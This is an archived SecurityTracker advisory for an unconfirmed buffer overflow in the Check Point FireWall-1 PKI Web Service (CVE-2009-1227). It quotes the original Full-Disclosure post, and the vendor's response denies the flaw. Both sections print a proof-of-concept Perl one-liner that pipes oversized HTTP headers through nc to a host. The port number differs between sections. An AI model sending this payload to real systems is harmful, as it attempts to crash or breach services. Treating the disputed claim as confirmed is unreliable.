[Unconfirmed] Check Point FireWall-1 Buffer Overflow in PKI Web Service Has Unspecified Impact
|
|
SecurityTracker Alert ID: 1021948 |
|
SecurityTracker URL: http://securitytracker.com/id/1021948
|
|
CVE Reference:
CVE-2009-1227
(Links to External Site)
|
Updated: Apr 10 2009
|
Original Entry Date: Mar 30 2009
|
Impact:
Not specified
|
Exploit Included: Yes
|
|
Description:
A vulnerability was reported in FireWall-1/VPN-1 in the PKI Web Service. The impact was not specified. [Editor's note: This vulnerability is unconfirmed.]
A remote user can reportedly send a specially crafted HTTP header 'Authorization' or 'Referer' value to the PKI Web Service on TCP port 18624 to trigger a buffer overflow.
A demonstration exploit [Perl command] request is provided:
perl -e 'print "GET / HTTP/1.0\r\nAuthorization: Basic" . "x" x 8192 .
"\r\nFrom: bugs@hugs.com\r\nIf-Modified-Since: Fri, 13 Dec 2006
09:12:58 GMT\r\nReferer: http://www.owasp.org/" . "x" x 8192 .
"\r\nUserAgent: FsckResponsibleDisclosure 1.0\r\n\r\n"' | nc
suckit.com 18264
BugsNotHugs reported this vulnerability.
The vendor has provided the following response:
"Check Point Security Alert Team has analyzed this report. We ve tried to reproduce the attack on all VPN-1 versions from NG FP2 and above with and without HFAs.
The issue was not reproduced. We have conducted a thorough analysis of the relevant code and verified that we are secure against this attack.
We consider this attack to pose no risk to Check Point customers."
[Editor's note: The original reporter stands by the report and indicates that the behavior was observed during a penetration test two years ago against an unknown version of the product. Note that the NG FP2 product was released in April 2002.]
|
Impact:
The impact was not specified.
|
Solution:
[Editor's note: The vendor has tested versions NG FP2 and later and cannot reproduce the reported behavior. The vendor has conducted code analysis on versions NG FP2 and later and indicates that the product is not affected. See the Description section for the vendor's response.]
|
Vendor URL: www.checkpoint.com/ (Links to External Site)
|
Cause:
Boundary error
|
Underlying OS:
|
|
Message History:
None.
|
Source Message Contents
|
Date: Mon, 30 Mar 2009 02:16:17 -0600
Subject: [Full-disclosure] Check Point Firewall-1 PKI Web Service HTTP
|
- Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow
- Description
The Check Point Firewall-1 PKI Web Service, running by default on TCP
port 18264, is vulnerable to a remote overflow in the handling of very
long HTTP headers. This was discovered during a pen-test where the
client would not allow further analysis and would not provide the full
product/version info. Initial testing indicates the 'Authorization'
and 'Referer' headers were vulnerable.
- Product
Check Point, Firewall-1, unknown
- PoC
perl -e 'print "GET / HTTP/1.0\r\nAuthorization: Basic" . "x" x 8192 .
"\r\nFrom: bugs@hugs.com\r\nIf-Modified-Since: Fri, 13 Dec 2006
09:12:58 GMT\r\nReferer: http://www.owasp.org/" . "x" x 8192 .
"\r\nUserAgent: FsckResponsibleDisclosure 1.0\r\n\r\n"' | nc
suckit.com 18264
- Solution
None
- Timeline
2006-11-06: Vulnerability Discovered
2009-03-29: Disclosed to Public
--
BugsNotHugs
Shared Vulnerability Disclosure Account
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
|
|
